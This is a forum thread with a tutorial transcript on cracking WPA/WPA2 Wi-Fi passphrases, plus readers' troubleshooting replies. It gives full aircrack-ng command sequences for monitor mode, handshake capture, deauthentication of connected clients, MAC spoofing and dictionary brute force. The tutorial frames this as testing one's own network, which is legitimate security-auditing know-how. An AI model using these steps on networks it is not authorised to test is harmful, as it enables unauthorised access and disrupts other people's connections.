Here is my submission of Xploitz WPA cracking vid #3.
I was to lazy to re-type all of it so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
Enjoy.
Here is my submission of Xploitz WPA cracking vid #3.
I was to lazy to re-type all of it so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
Enjoy.
Quote:
Originally Posted by {In}Secure
Nice. Thanks for taking the time to do that. There were a few errors within the transcript. Mainly because the OCR program that was used mixed up the number 1 with the letter l..and vice versa..and the number 0 for a Q like ath0 was turned into athQ. I however demand accuracy with my tutorials...
So here is my edited and revised copy of this transcript, not for download..but for online viewing. Feel free though to copy and paste it to Windows notepad or Linuxs' KWrite.:) Thanks again {In}Secure for posting.
Code:-=Xploitz=- E-Z Video Tutorial: Cracking WPA/WPA2
Date of video: August 09, 2007
Hello everyone, : )
Welcome once again to another great E-Z VIDEO Tutorial taught
to you by your newly appointed remote-exploit.org Moderator,
me....-=Xploitz=-
This time were gonna step it up a little bit and try our hand at our
WPA/WPA2 TKIP or TKIP+AES network, Whats the difference
between cracking a WPA network -VS- a WPA2 network??
Answer. , .ABSOLUTELY NOTHING!! There is no difference between
cracking WPA or WPA2 networks at all. In order to SUCCESSFULLY
crack any WPA/WPA2 network, there are 2 main key things that
must happen. (1) YOU MUST CAPTURE THE FULL 4 WAY
HANDSHAKE!! AIRODUMP-NG WILL LET YOU KNOW BY TELLING
YOU. IF YOU LOOK AT THE TOP RIGHT HAND CORNER OF YOUR
AIRODUMP-NG SCREEN IT WILL REGISTER AND LET YOU KNOW BY
SAYING " [ WPA handshake: 00:18:F8;B5:F2:D6] (2) YOUR
PASSPHRASE MUST BE IN THE DICTIONARY YOU CHOSE IN
ORDER TO SUCCESSFULLY BRUTE FORCE IT WITH AIRCRACK-NG.
***SPECIAL NOTE!!!***
IF YOUR NETWORK IS ENCRYPTED WITH WPA/WPA2 +AES.....
COWPATTY WILL NOT WORK. COWPATTY ONLY WORKS
WITH TKIP.Thats why I'm using aircrack-ng to crack my
WPA2/TKIP+AES network, NOW THAT THATS BEEN SAID,
...LETS BEGIN SHALL WE??
First off, we're gonna put our interface into monitor mode.
To accomplish this we type in...
airmon-ng stop <device>
My device is Atheros chipped so it would like,.,
airmon-ng stop ath0
Next, we type in,
airmon-ng start <device>,
Again, my card is an Atheros chipped card so I'll use ath0 to
place my ath0 interface into monitor mode, Other devices
may only be required to use eth0, wlan0 etc... So for mine its. . .
airmon-ng start ath0
Start airodump-ng to collect the authentication handshake.
If you don't know your networks details, just type in...,
airodump-ng <device>
mine will look like...
airodump-ng ath0
After you run airodump and you see your network and
its connected client(s),
press ^c (Thats Ctrl c)
This action will break you out of airodumps process and
give you a new command line. Use this when you want to
switch back and fourth to copy and paste your networks details.
Now, open a new shell window and fill in all your networks
info so that we can focus on only your network and lock
onto it, To do this you'll type...
airodump-ng -c (Channel your AP is on) -w (file name) --bssid (your APS bssid here) <device>
Mine looks like...
airodump-ng -c 6 -w psk --bssid 00:18:F8:B5:F2;D6 ath0
***Important***Do NOT use the --ivs option.
You must capture the full packets!
Use Aireplay-ng to de-authenticate the wireless client
To accomplish this we type in...
aireplay-ng -0 1 -a <AP MAC> -c <Clients MAC> <Device>.
Mine looks like this...
aireplay-ng -0 1 -a 00:18:F8:B5:F2:D6 -c 08:14:A5:F6:83:E3 ath0
You'll know your attack was successful!, if your
airodump-ng screen looks similar to this,..
CH 6 H Elapsed: 2 mins ][-08-08 14:37][ WPA handshake 00:18:F8:B5:F2:D6]
BSSID PWR RXO Beacons #Data #/s CH MB ENC CIPHER AUTM ESSID
E0:18:F8:B5:F2:D6 68 1298 645 3 6 48 WPA2 CCMP PSK XploitZ
BSSID STATION PWR Rate Lost Packets Probes
00:18:F8:B5:F2:D6 08:14:A5:F6:83:E3 56 54-54 0 1019
Notice the *[ WPA handshake: 00:18:F8:B5:F2:D6] in the upper
part of the above text?? This confirms that you have captured
the complete 4 way handshake, ;)
***IMPORTANT NOTE!!***
If there is not a client connected, and you suspect there
is one connected,.just type in
aireplay-ng -0 1 -a <BSSID> <Device>
And they'll appear if their connected!
OPEN A NEW SHELL
Run aircrack-ng to crack the pre-shared key,
To do this we type in the command...,
aircrack-ng -w password.lst -b <AP's BSSID HERE> filename.cap
Mine looks like this,..
aircrack-ng -w algae.txt -b 00:18:F8:B5:F2:D6 psk*.cap
You can use .txt or .lst dictionaries. It doesn't matter which
type of dictionary you use. Just make sure if your dictionary is
called passwords.lst, you type in passwords.lst and not .txt.
Also, your pass-phrase MUST BE IN THE DICTIONARY FOR
THIS ATTACK TO WORK!! Also please note that my dictionary
is located in my home folder or /root directory, therefore there is
no need to type in the full path to my dictionary;} There are
other methods including the use of a pre-compiled list of
passwords with your ESSID, but this particular tutorial will NOT
cover it. I will do another video explaining step by step all the
correct processes you need to build a database and pre-compile
it with your ESSID and password list in the very near future.
It's ok
card : Alfa AWUS036H
chipset : rtl8187
Unplug alpha
BootVMware
plug alphaCode:cd rtl8187_linux_26.1010.0622.2006
sh wlan0up
New shellCode:sh wlan0up
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0 1
airodump-ng -c 1 -w psk --bssid [BSSID_AP] wlan0
Sending DeAuth to station -- STMAC : [[BSSID_CLIENT]]Code:aireplay-ng -0 1 -a [BSSID_AP] -c [BSSID_CLIENT] wlan0
but no handshake
PWR : about 50
CH : 1
ENC : WPA
CLIPHER : TKIP
AUTH : PSK
ESSID : AOLbox***
try doing -0 5 instead of -0 1 in your deauth command. Your close to the AP and the client correct? You MUST BE CLOSE TO BOTH..not just the AP..its different than in cracking WEP... where you only need to be close to the AP.
BTW...why are you using macchanger for WPA/WPA2??? :confused: Its not needed since your not using your card to connect or associate/authenticate with the AP.
I reach 60 at the maximum PWR for the AP
I reach 35 at the maximum PWR for the CLIENT
If i use an other card on windows XP and i try to connect to the AP,on VMware I can see an other client (me) with a power -1. But the command
gives nothingCode:aireplay-ng -0 1 -a [BSSID_AP] -c [MY_BSSID_CLIENT] wlan0
I tried -0 0 too
EDIT : i have already try 1.0-dev but i was farther when i try 1.0-dev
I will try again
Have you updated to the most recent version of aircrack??
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng
make
make install
I tried both version aircrack
With 1.0dev, instead of
i can note this messageCode:[ WPA handshake 00:18:F8:B5:F2:D6] (in your tuto)
Code:[ 140bytes keystream :[BSSID_AP]
Don't use 1.0 dev for this..use my posted svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
I say use that because there was an issue with the aircrack-ng dictionary capitals and special letters not working out right..example..my passphrase was -=Xploitz=-...I had -=Xploitz=- in my dictionary...but because of the -==- in my passphrase..aircrack dev 1.0 wouldn't read it right. So please use the above version instead. Don't know if it will fix your problem or not..but its worth a shot.
Do me a favor..test to see if your on the same channel as the AP. Right before you enter your aireplay-ng -0 1 ..etc...command..do a ifconfig wlan0 and a iwconfig wlan0 to verify your on the same channel. Im starting to run out of solutions to help you. Have you updated your cards drivers as well??
Try to see if your card is capable of injecting...
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 -i wlan0 ath0
Where:
IMPORTANT: You must set your card to the desired channel with airmon-ng prior to running any of the tests.
- -9 means injection test. Long form is - -test. (Double dash)
- -e teddy is the network name (SSID). This is optional.
- -a 00:14:6C:7E:40:80 ath0 is MAC address of the access point (BSSID). This is optional.
- -i wlan0 is interface name of the second card if you want to determine which attacks your card supports. This is optional.
- ath0 is the interface name or airserv-ng IP Address plus port number. For example - 127.0.0.1:666. (Mandatory)
First,i think i have already the best version of aircrack.
Mine is in /modules/aircrack_0.91.lzm
On the page:
i have the version of 25/Jun/2007Code:h ttp://forums.remote-exploit.org/showthread.php?t=6784
I have to download this version ?:
Secondly,i do the test :Code:svn co h ttp://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
Code:airmon-ng star wlan0 1
aireplay-ng -9 wlan0
EDIT : I will try the lastest version of my alpha (*Update 26/Jun/2007)Code:00:14:6C:7E:40:80 - chennel 1 - "teddy "
Ping : 2ms/25/49
28/30 93%
EDIT2 : I have an interrogation Xploitz.
When I type
i can see:Code:aircrack-ng -w pass psk*.cap
But it's a WPA key for airodump-ng. Have you got an explication ?Code:Encryption
WEP (**IVs)
thanks
EDIT3 : so i tryto do
but, i have something like that :Quote:
aireplay-ng -1 1 -e teddy -a [AP_BSSID] -h [CLIENT_BSSID] wlan0
I don't think that is goodQuote:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request
EDIT4 :
With the latest version for alpha end aircrack 0.9.1svn499 :
i can see:Code:aircrack-ng -w pass psk*.cap
it's better than WEP (**IVs)Code:Encryption
WAP (0 handshake)
-=Xploitz=-
WOW, this is a great video. I am a noobie, and for me it was wonderful. very clear and concise.
The one thing i was a little off about was having to have my WPA Key in the password list. Wouldn't that defeat the purpose of really testing a network? I want to test my network or a clients network but if i already knew their passcode then it is like "cheating"
have you done a video fo try to crack a WPA without knowing the passcode?
Either way, your tuts are always very easy for me to follow
thank you. keep up the awesome work.